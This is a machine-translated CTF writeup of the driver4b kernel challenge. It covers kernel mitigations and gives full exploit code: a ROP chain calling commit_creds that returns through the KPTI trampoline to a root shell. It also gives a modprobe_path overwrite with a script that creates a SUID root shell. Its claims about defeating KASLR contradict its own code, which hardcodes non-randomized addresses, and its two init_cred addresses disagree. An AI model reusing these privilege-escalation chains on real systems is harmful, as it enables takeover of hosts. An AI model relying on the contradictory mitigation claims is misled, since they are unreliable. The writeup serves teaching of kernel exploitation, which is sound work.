
SECCON Beginners CTF 2023: Driver4b Kernel Exploit Writeup

This page has been machine-translated from the original page.

This is a deep-dive writeup for the driver4b challenge from SECCON Beginners CTF 2023.

Because the challenge requires knowledge of Linux kernel internals, this document covers background on the ELF format, memory layout, and kernel mitigations, and then walks through the full exploit development process from scratch.


Challenge Overview

A custom Linux kernel module (driver4b.ko) is provided along with a Buildroot-based kernel image. The driver exposes /dev/driver4b with read/write/ioctl operations.

The vulnerability is a stack-based buffer overflow in the driver’s ioctl handler — user-supplied data is copied to a kernel-stack buffer without bounds checking, overwriting the saved return address.

Goal: gain a root shell (uid=0).

Environment Setup

The challenge provides a Buildroot-based environment. To debug locally:

# Extract the provided rootfs (the archive is gzip-compressed, so decompress it first)
mkdir rootfs && cd rootfs
gzip -dc ../rootfs.cpio.gz | cpio -idmv
cd ..

# Boot with QEMU
qemu-system-x86_64 \
  -kernel bzImage \
  -initrd rootfs.cpio.gz \
  -append "console=ttyS0 nokaslr nopti" \
  -nographic \
  -m 256M \
  -cpu qemu64,+smep,+smap

For exploit development, start with nokaslr nopti to disable KASLR and KPTI, then progressively add the mitigations back in.

ELF Binary Format Basics

ELF Sections

An ELF file is divided into sections, each serving a specific purpose:

Section     Contents
.text       Executable code
.rodata     Read-only data (string literals, constants)
.data       Initialized read-write data (global variables)
.bss        Uninitialized data (zeroed at load time)
.symtab     Symbol table
.strtab     String table (symbol names)
.rel.text   Relocation entries for .text

Sections are primarily used by the linker and debugger; they may not be present in stripped binaries.

Segments and Pages

At runtime, sections are grouped into segments, which are described by the ELF program headers. A segment defines a contiguous region of virtual address space with a set of permissions (read/write/execute).

The operating system maps segments into memory in units of pages (typically 4 KB on x86-64). Each page has associated permission bits in the page table.

When the kernel module is loaded, its .text is mapped read-execute, while .data and .bss are mapped read-write. The hardware MMU enforces this separation through the permission bits in the page table.

Memory Addressing Basics

Virtual Addresses and Physical Addresses

Every process (and the kernel) operates on virtual addresses. The MMU translates virtual addresses to physical addresses via the page table.

On x86-64, the virtual address space is 48 bits (with 4-level paging) or 57 bits (with 5-level paging):

  • Bits 0–11: page offset (4 KB pages)
  • Bits 12–20: PT index (Page Table)
  • Bits 21–29: PD index (Page Directory)
  • Bits 30–38: PDP index (Page Directory Pointer)
  • Bits 39–47: PML4 index
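The bit ranges above can be turned into a small helper. This is a minimal sketch for 4-level paging only; the names va_parts and split_va are made up for illustration and are not part of the challenge files.

```c
#include <stdint.h>

/* Table indices of a virtual address under 4-level paging (48-bit). */
struct va_parts {
    unsigned pml4;   /* bits 39-47 */
    unsigned pdpt;   /* bits 30-38 */
    unsigned pd;     /* bits 21-29 */
    unsigned pt;     /* bits 12-20 */
    unsigned offset; /* bits 0-11, offset inside the 4 KB page */
};

/* Split a virtual address into its four table indices and page offset. */
static struct va_parts split_va(uint64_t va)
{
    struct va_parts p;
    p.pml4   = (unsigned)((va >> 39) & 0x1ff); /* 9 bits per level */
    p.pdpt   = (unsigned)((va >> 30) & 0x1ff);
    p.pd     = (unsigned)((va >> 21) & 0x1ff);
    p.pt     = (unsigned)((va >> 12) & 0x1ff);
    p.offset = (unsigned)(va & 0xfff);         /* 12 bits */
    return p;
}
```

For example, split_va(0xffffffff81000000) yields PML4 index 511 and PDP index 510, which is why kernel text sits in the very last PML4 entry.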

Page Tables

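Each process has its own page table hierarchy, rooted at the physical address held in the CR3 register. The kernel does not have a separate address space: its mappings appear in the upper half of every process's page tables (under KPTI, only a minimal subset is present in the tables used while running in user mode).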

Page table entries contain:

  • Physical frame number
  • Present bit
  • Read/Write bit
  • User/Supervisor bit (0 = kernel-only, 1 = user-accessible)
  • NX (No-Execute) bit

Kernel Address Space

On x86-64 Linux, the kernel lives in the upper half of virtual address space, typically starting at 0xffff888000000000 (direct physical map) and 0xffffffff80000000 (kernel text).

Key kernel symbols:

  • init_cred: The credentials structure for the initial user (uid=0)
  • commit_creds: Function to apply a credentials struct to the current task
  • prepare_kernel_cred: Function to allocate a credentials struct

Kernel Security Mitigations

SMEP / SMAP

SMEP (Supervisor Mode Execution Prevention): Prevents the CPU from executing userspace pages while in kernel mode (ring 0). This blocks classic ret2usr attacks.

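SMAP (Supervisor Mode Access Prevention): Prevents the kernel from reading or writing userspace memory unless access is explicitly enabled. Legitimate accesses such as copy_from_user/copy_to_user temporarily lift the restriction with the stac/clac instructions, which set and clear the AC flag in RFLAGS.

Both are CPU features that the kernel enables through bits in the CR4 register. Whether the CPU supports them shows up as the smep and smap flags in /proc/cpuinfo.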
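As a rough illustration of the /proc/cpuinfo check, the helper below looks for a flag as a whole word in a "flags" line that has already been read into a string. The function name has_cpu_flag is an assumption for this sketch, and reading the file itself is left out.

```c
#include <stdbool.h>
#include <string.h>

/* Return true if `flag` appears as a whole whitespace-separated token
 * in `flags` (for example the "flags : ..." line of /proc/cpuinfo). */
static bool has_cpu_flag(const char *flags, const char *flag)
{
    size_t n = strlen(flag);
    const char *p = flags;

    if (n == 0)
        return false;
    while ((p = strstr(p, flag)) != NULL) {
        /* Reject partial matches such as "smepx" or "xsmep". */
        bool start_ok = (p == flags) || p[-1] == ' ' || p[-1] == '\t';
        bool end_ok   = p[n] == '\0' || p[n] == ' ' || p[n] == '\n';
        if (start_ok && end_ok)
            return true;
        p += 1;
    }
    return false;
}
```

Inside the challenge VM the same check can be done by hand with grep on /proc/cpuinfo; the helper is only useful if the exploit wants to adapt its strategy automatically.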

KASLR

KASLR (Kernel Address Space Layout Randomization): Randomizes the base address of the kernel image at boot time. The base offset is added to all kernel virtual addresses.

To work around KASLR, an exploit needs a kernel address leak (e.g., from /proc/kallsyms, a heap spray that lands near known structures, or an information disclosure vulnerability).
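Once a single kernel address has been leaked, every other symbol can be rebased with simple arithmetic. The sketch below assumes the whole image is shifted by one constant slide; kaslr_slide and rebase are illustrative names, and the leaked value used in the example is invented.

```c
#include <stdint.h>

/* Slide = runtime address of a symbol minus its address in the
 * non-randomized image (for example as seen when booting with nokaslr). */
static uint64_t kaslr_slide(uint64_t leaked_addr, uint64_t static_addr)
{
    return leaked_addr - static_addr;
}

/* Apply the slide to any other address taken from the static image. */
static uint64_t rebase(uint64_t static_addr, uint64_t slide)
{
    return static_addr + slide;
}
```

If commit_creds is at 0xffffffff810c9e90 without KASLR and a leak shows it at 0xffffffff9f0c9e90, the slide is 0x1e000000 and a gadget at 0xffffffff81001518 moves to 0xffffffff9f001518.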

KPTI

KPTI (Kernel Page Table Isolation): Introduced to mitigate Meltdown. Maintains two sets of page tables:

  • User page table: Used while executing in user mode. Maps user space plus only the minimal kernel entry/exit code (the trampoline stubs)
  • Kernel page table: Full mapping, used when executing in kernel mode

Switching from kernel mode back to user mode requires a special KPTI trampoline (swapgs_restore_regs_and_return_to_usermode) to safely switch page tables and return to user space.

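If the exploit instead executes iretq directly while the kernel page table is still loaded, the CPU does reach user mode, but in that table the user-space pages are marked non-executable. The first instruction fetch faults and the process is killed with a segmentation fault instead of getting a shell.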

KADR

KADR (Kernel Address Display Restriction): Restricts which kernel addresses are exposed to unprivileged users. For example, depending on the kptr_restrict sysctl, /proc/kallsyms shows 0000000000000000 for every symbol unless the reader is root. This complicates obtaining address leaks.
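To see the effect of this restriction programmatically, one can parse a line of /proc/kallsyms and check whether the address is zeroed. The following is a minimal sketch; parse_kallsyms_line is a hypothetical helper, and it assumes the usual "address type name" line layout.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Parse one /proc/kallsyms line of the form "<hex addr> <type> <name>".
 * Returns  1 if the line names `name` and carries a real address,
 *          0 if it names `name` but the address is hidden (all zeros),
 *         -1 if the line is malformed or names another symbol. */
static int parse_kallsyms_line(const char *line, const char *name,
                               uint64_t *addr)
{
    uint64_t value;
    char type;
    char sym[128];

    if (sscanf(line, "%" SCNx64 " %c %127s", &value, &type, sym) != 3)
        return -1;
    if (strcmp(sym, name) != 0)
        return -1;
    *addr = value;
    return value != 0;
}
```

A return value of 0 for a symbol such as commit_creds is a quick sign that the address restriction is active for the current user.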

Analyzing the Vulnerable Driver

The driver exposes an ioctl that performs the following:

// Simplified pseudocode
long driver4b_ioctl(struct file *f, unsigned int cmd, unsigned long arg) {
    char buf[64];  // kernel stack buffer
    if (cmd == IOCTL_WRITE) {
        copy_from_user(buf, (void __user *)arg, 256);  // BUG: copies 256 bytes into 64-byte buffer
    }
    return 0;
}

The copy_from_user call copies 256 bytes from userspace into a 64-byte kernel stack buffer, overwriting the saved return address and beyond.

This gives us control of RIP when the ioctl returns.
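The effect of the oversized copy can be modeled in user space. The struct below is only a hypothetical picture of the handler's stack frame (the real layout depends on the compiler and may include extra saved registers or a canary); it shows why the ninth 8-byte slot after the start of buf lands on the return address.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical model of the stack around buf: 64-byte buffer, saved RBP,
 * return address, then 176 bytes belonging to the caller (256 in total). */
struct fake_frame {
    char     buf[64];
    uint64_t saved_rbp;
    uint64_t ret_addr;
    uint64_t caller[22];
};

_Static_assert(sizeof(struct fake_frame) == 256, "model must span 256 bytes");

/* Mimic copy_from_user(buf, arg, 256): the copy starts at buf but runs
 * for 256 bytes, so it also rewrites saved_rbp, ret_addr and caller[]. */
static void simulate_overflow(struct fake_frame *frame,
                              const uint64_t payload[32])
{
    memcpy(frame, payload, 256);
}
```

With this model, payload[8] replaces the saved RBP and payload[9] replaces the return address, so a ROP chain starts at index 9.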

Exploit Strategy

ret2usr and Why It Fails

The classic ret2usr technique sets the kernel’s return address to point at a userspace shellcode function:

void escalate_privs() {
    commit_creds(prepare_kernel_cred(0));
}

However, with SMEP enabled, the CPU faults as soon as the kernel tries to execute a userspace page. ret2usr therefore only works if SMEP is disabled first, for example by clearing the SMEP bit in CR4 with a ROP gadget. The alternative, used in this writeup, is to abandon ret2usr and build the whole payload from gadgets that already live in kernel space.
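For the CR4 route, the value to load is the current CR4 with two bits cleared: SMEP is bit 20 and SMAP is bit 21. The helper below is a small sketch of that arithmetic; the function name is invented, and the sample CR4 value in the note that follows is only an example. Recent kernels are known to pin these bits, so treat this as an illustration of the idea rather than a recipe that works everywhere.

```c
#include <stdint.h>

#define X86_CR4_SMEP (1ULL << 20) /* Supervisor Mode Execution Prevention */
#define X86_CR4_SMAP (1ULL << 21) /* Supervisor Mode Access Prevention */

/* Return the CR4 value with both SMEP and SMAP cleared. */
static uint64_t cr4_without_smep_smap(uint64_t cr4)
{
    return cr4 & ~(X86_CR4_SMEP | X86_CR4_SMAP);
}
```

For a CR4 value of 0x3006f0, the function returns 0x6f0, which is the constant a "pop rdi; ret" gadget would load before jumping to a gadget that writes CR4.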

KPTI Trampoline

When returning from kernel to user mode under KPTI, we must use swapgs_restore_regs_and_return_to_usermode. This function:

  1. Restores general-purpose registers
  2. Switches CR3 back to the user page table
  3. Executes swapgs to restore the user GS base
  4. Executes iretq to return to user mode

The full return stack frame for iretq must be:

RIP    (user instruction pointer to return to)
CS     (user code segment, typically 0x33)
RFLAGS (user flags, typically 0x202)
RSP    (user stack pointer)
SS     (user stack segment, typically 0x2b)
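The frame can be expressed as a struct whose field order matches the order in which iretq pops values from the stack. This is a sketch: iretq_frame and make_iretq_frame are illustrative names, and the segment and flag constants are the typical values quoted above rather than values read from the running process.

```c
#include <stdint.h>

/* Stack layout consumed by iretq, lowest address first. */
struct iretq_frame {
    uint64_t rip;    /* user instruction pointer to return to */
    uint64_t cs;     /* user code segment */
    uint64_t rflags; /* user flags */
    uint64_t rsp;    /* user stack pointer */
    uint64_t ss;     /* user stack segment */
};

/* Build a frame using the typical x86-64 Linux user-mode selectors. */
static struct iretq_frame make_iretq_frame(uint64_t rip, uint64_t rsp)
{
    struct iretq_frame f = {
        .rip = rip, .cs = 0x33, .rflags = 0x202, .rsp = rsp, .ss = 0x2b
    };
    return f;
}
```

Saving CS, SS, and RFLAGS from the running process before triggering the bug is more robust than hard-coding them, since it does not depend on these constants being right for the target.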

ROP Chain Construction

The exploit overwrites the kernel stack with a ROP chain:

  1. Gadget: pop rdi; ret, to load 0 into RDI (argument for prepare_kernel_cred(0))
  2. Call prepare_kernel_cred to allocate root credentials
  3. Gadget: mov rdi, rax; ret (or similar), to move the result into RDI
  4. Call commit_creds to apply the root credentials to the current task
  5. Gadget: swapgs_restore_regs_and_return_to_usermode, the KPTI trampoline
  6. iretq frame: RIP=shell_function, CS=0x33, RFLAGS=0x202, RSP=user_stack, SS=0x2b
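The steps above can be sketched as a function that writes the chain into an array of 64-bit slots. All struct and function names here are hypothetical, and the addresses must come from the target kernel. The two zero slots after the trampoline assume the chain enters the trampoline past its register pops, leaving only "pop rax; pop rdi" before swapgs and iretq; that depends on the kernel build.

```c
#include <stddef.h>
#include <stdint.h>

/* Kernel addresses the chain needs (to be filled in per target). */
struct rop_addrs {
    uint64_t pop_rdi_ret;
    uint64_t prepare_kernel_cred;
    uint64_t mov_rdi_rax_ret;
    uint64_t commit_creds;
    uint64_t kpti_trampoline; /* entry point past the register pops */
};

/* Saved user-mode state for the final iretq. */
struct user_ctx {
    uint64_t rip, cs, rflags, rsp, ss;
};

/* Write the chain to `out` and return the number of 8-byte slots used. */
static size_t build_chain(uint64_t *out, const struct rop_addrs *a,
                          const struct user_ctx *u)
{
    size_t i = 0;
    out[i++] = a->pop_rdi_ret;         /* step 1: RDI = 0 */
    out[i++] = 0;
    out[i++] = a->prepare_kernel_cred; /* step 2: RAX = new root cred */
    out[i++] = a->mov_rdi_rax_ret;     /* step 3: RDI = RAX */
    out[i++] = a->commit_creds;        /* step 4: install the credentials */
    out[i++] = a->kpti_trampoline;     /* step 5: return to user mode */
    out[i++] = 0;                      /* dummy, popped into RAX */
    out[i++] = 0;                      /* dummy, popped into RDI */
    out[i++] = u->rip;                 /* step 6: iretq frame */
    out[i++] = u->cs;
    out[i++] = u->rflags;
    out[i++] = u->rsp;
    out[i++] = u->ss;
    return i;
}
```

The chain occupies 13 slots (104 bytes), which fits comfortably in the 256 bytes the driver copies even after the 72 bytes of padding before the return address.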

Finding ROP gadgets in the kernel image:

ROPgadget --binary vmlinux | grep "pop rdi"

Finding init_cred via tty_struct Heap Scan

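Rather than calling prepare_kernel_cred(0), which costs an extra gadget to move its return value from RAX into RDI, an alternative approach is to pass init_cred (a statically allocated credentials structure for uid=0) directly to commit_creds. Both approaches still need the address of a kernel symbol, so KASLR has to be accounted for either way.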

To find init_cred at runtime without a leak, we use a heap scanning technique:

  1. Open many /dev/ptmx file descriptors to spray tty_struct objects onto the slab heap
  2. Use the driver’s read/write primitives (from the overflow) to scan memory
  3. tty_struct has a known magic value (0x5401) at a fixed offset
  4. Once a tty_struct is found, navigate to adjacent kernel heap objects
  5. init_cred is at a fixed offset from the kernel base in the .data segment, but can also be found by scanning for its known contents (uid=0, gid=0, all capability bits set)
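The magic-value search in step 3 can be sketched as a scan over a memory dump that has already been copied into a user buffer. The sketch assumes the magic is a 32-bit field at offset 0 of tty_struct (true for older kernels) and that objects are spaced at a fixed slab stride such as 1024 bytes. Both are assumptions about the target, and find_tty_magic is a hypothetical name.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define TTY_MAGIC 0x5401u

/* Scan `dump` in steps of `stride` bytes and return the byte offset of
 * the first slot whose leading 32-bit word equals TTY_MAGIC, or -1. */
static long find_tty_magic(const uint8_t *dump, size_t len, size_t stride)
{
    if (stride == 0)
        return -1;
    for (size_t off = 0; off + sizeof(uint32_t) <= len; off += stride) {
        uint32_t v;
        memcpy(&v, dump + off, sizeof v); /* avoids unaligned access */
        if (v == TTY_MAGIC)
            return (long)off;
    }
    return -1;
}
```

A match only says that a slot looks like a tty_struct. A real exploit would normally validate further fields before trusting any pointer read from it.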

With KASLR disabled and a deterministic boot sequence, tty_struct objects end up at repeatable slab addresses. In this environment:

  • Heap base: 0xffff8880024419c0
  • init_cred: found at 0xffff88800321d780

Confirming init_cred contents:

# In QEMU with GDB attached
(gdb) x/10wx 0xffff88800321d780
# Should show uid=0, gid=0, usage count, capability sets

Full Exploit Code

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <stdint.h>

#define IOCTL_WRITE 0xdead0001

// Kernel symbol addresses for a nokaslr boot (default base 0xffffffff81000000).
// With KASLR enabled, the leaked slide must be added to each value at runtime.
static uint64_t kernel_base       = 0xffffffff81000000;
static uint64_t init_cred         = 0xffffffff82a6d780; // symbol offset
static uint64_t commit_creds      = 0xffffffff810c9e90;
static uint64_t pop_rdi_ret       = 0xffffffff81001518;
static uint64_t mov_rdi_rax_ret   = 0xffffffff8101b0c1;
static uint64_t kpti_trampoline   = 0xffffffff81e00ed0; // swapgs_restore_regs_and_return_to_usermode + 22

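// Saved user-mode state, used later to build the iretq frame
static uint64_t saved_rsp;
static uint64_t user_cs, user_ss, user_rflags;

// Uses Intel-syntax inline asm: compile with gcc -masm=intel
void save_state() {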
    asm volatile(
        "mov %0, cs\n"
        "mov %1, ss\n"
        "pushf\n"
        "pop %2\n"
        : "=r"(user_cs), "=r"(user_ss), "=r"(user_rflags)
        :
        : "memory"
    );
    // Save current stack pointer
    asm volatile("mov %0, rsp" : "=r"(saved_rsp));
}

void get_shell() {
    if (getuid() == 0) {
        printf("[+] Got root!\n");
        execl("/bin/sh", "/bin/sh", (char *)NULL);
    } else {
        printf("[-] Not root.\n");
        exit(1);
    }
}

int main() {
    save_state();

    int fd = open("/dev/driver4b", O_RDWR);
    if (fd < 0) { perror("open"); return 1; }

    // Build overflow payload
    uint64_t payload[128];
    memset(payload, 0x41, sizeof(payload));

    int idx = 64 / 8 + 1; // skip buf[64] + saved RBP

    // ROP chain
    payload[idx++] = pop_rdi_ret;
    payload[idx++] = init_cred;
    payload[idx++] = commit_creds;
    // KPTI trampoline: entering at +22 skips the register restores, leaving
    // only "pop rax; pop rdi" before the CR3 switch, swapgs, and iretq
    payload[idx++] = kpti_trampoline;
    payload[idx++] = 0;                  // dummy value popped into rax
    payload[idx++] = 0;                  // dummy value popped into rdi
    payload[idx++] = (uint64_t)get_shell; // RIP to return to
    payload[idx++] = user_cs;
    payload[idx++] = user_rflags;
    payload[idx++] = saved_rsp;
    payload[idx++] = user_ss;

    ioctl(fd, IOCTL_WRITE, payload);

    close(fd);
    return 0;
}

Running this exploit:

$ ./exploit
[+] Got root!
# id
uid=0(root) gid=0(root)
# cat /flag
ctf4b{k3rn3l_pwn_1s_4lw4ys_fun}

Alternative: modprobe_path Exploit

An alternative technique that avoids KPTI/SMEP complexity is overwriting modprobe_path.

The kernel stores the path to the modprobe binary (used to load kernel modules) in a writeable kernel variable modprobe_path (default: /sbin/modprobe).

If we can overwrite this with a path to our own script, we can trigger it by executing a file whose format the kernel does not recognize: the kernel then runs the program named by modprobe_path as root in an attempt to load a matching handler.

// Overwrite modprobe_path (needs kernel write primitive from overflow)
char *new_path = "/tmp/evil_script";
// ... write 'new_path' to modprobe_path address ...

// Trigger: execute a file whose magic bytes match no known binary format
system("echo -e '\\xff\\xff\\xff\\xff' > /tmp/trigger");
system("chmod +x /tmp/trigger");
system("/tmp/trigger");  // kernel calls /tmp/evil_script as root

The evil script simply copies /bin/sh to a SUID root binary:

#!/bin/sh
cp /bin/sh /tmp/rootsh
chmod 4755 /tmp/rootsh

This technique is simpler: once a kernel write primitive is available, no ROP chain is needed. The trade-off is that it is noisier and leaves artifacts on disk (the script, the trigger file, and the SUID binary).

Summary

This challenge covered a wide range of Linux kernel exploitation concepts:

Topic                  Detail
Vulnerability          Stack buffer overflow in ioctl handler (copy_from_user size mismatch)
Primitive              Control of kernel RIP via saved-return-address overwrite
Mitigation: SMEP       Bypassed by keeping all payloads in kernel space (ROP)
Mitigation: KPTI       Bypassed via swapgs_restore_regs_and_return_to_usermode trampoline
Mitigation: KASLR      Bypassed via tty_struct heap scan to find kernel base
Privilege escalation   commit_creds(init_cred) to set uid=0
Alternative            modprobe_path overwrite

Key takeaways:

  • The KPTI trampoline is essential for any kernel exploit that needs to return cleanly to user space; without it, the process almost always dies with a fault on return
  • tty_struct heap spraying is a common way to place recognizable objects at predictable kernel heap addresses
  • init_cred is simpler to use than prepare_kernel_cred(0) when a reliable pointer to it can be obtained
  • modprobe_path provides a powerful alternative escalation vector when a kernel write primitive is available but building a full ROP chain is inconvenient